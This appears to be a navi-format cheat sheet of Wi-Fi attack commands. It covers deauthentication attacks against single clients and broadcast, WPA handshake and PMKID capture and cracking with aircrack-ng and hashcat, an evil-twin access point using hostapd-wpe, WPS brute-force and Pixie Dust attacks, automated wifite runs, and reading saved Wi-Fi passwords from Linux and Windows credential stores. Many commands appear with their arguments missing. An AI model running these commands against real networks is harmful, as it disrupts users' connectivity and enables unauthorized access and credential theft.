% wireless, wifi, aircrack, wpa, hacking # Check wireless interfaces iwconfig # Kill interfering processes sudo airmon-ng check kill # Start monitor mode sudo airmon-ng start # Stop monitor mode sudo airmon-ng stop # Scan for networks sudo airodump-ng # Target specific network (capture handshake) sudo airodump-ng -c --bssid -w # Deauth attack (force handshake) sudo aireplay-ng -0 -a -c # Deauth broadcast (all clients) sudo aireplay-ng -0 -a # Crack WPA/WPA2 handshake aircrack-ng -w -b # Crack with hashcat (faster - convert first) cap2hccapx output.hccapx hashcat -m 22000 output.hccapx # PMKID attack (no handshake needed) sudo hcxdumptool -i -o pmkid.pcapng --enable_status=1 # Convert PMKID for hashcat hcxpcapngtool -o hash.22000 pmkid.pcapng hashcat -m 22000 hash.22000 # Fake AP with hostapd-wpe sudo hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf # WPS attack with reaver sudo reaver -i -b -vv # WPS attack with bully sudo bully -b -c # Pixie dust attack (WPS) sudo reaver -i -b -vv -K 1 # Wifite - automated attacks sudo wifite # Wifite - WPA only sudo wifite --wpa # Check if handshake captured aircrack-ng # Create wordlist from AP info crunch 8 8 -t %%%% -o custom_wordlist.txt # Wash - find WPS enabled APs sudo wash -i # Fern WiFi Cracker (GUI) sudo fern-wifi-cracker # Kismet - wireless detection kismet # Show saved WiFi passwords (Linux) sudo cat /etc/NetworkManager/system-connections/* | grep psk= # Show saved WiFi passwords (Windows) netsh wlan show profile name="" key=clear $ interface: iw dev | grep Interface | awk '{print $2}' $ monitor_interface: iw dev | grep Interface | awk '{print $2}' | head -1 $ channel: echo "1\n6\n11" $ bssid: echo "" $ client_mac: echo "" $ output_prefix: echo "capture" $ capture_file: find . -name "*.cap" -o -name "*.pcap" 2>/dev/null $ wordlist: echo "/usr/share/wordlists/rockyou.txt" $ count: echo "5\n10\n0" --- --header "0=continuous" $ ssid: echo ""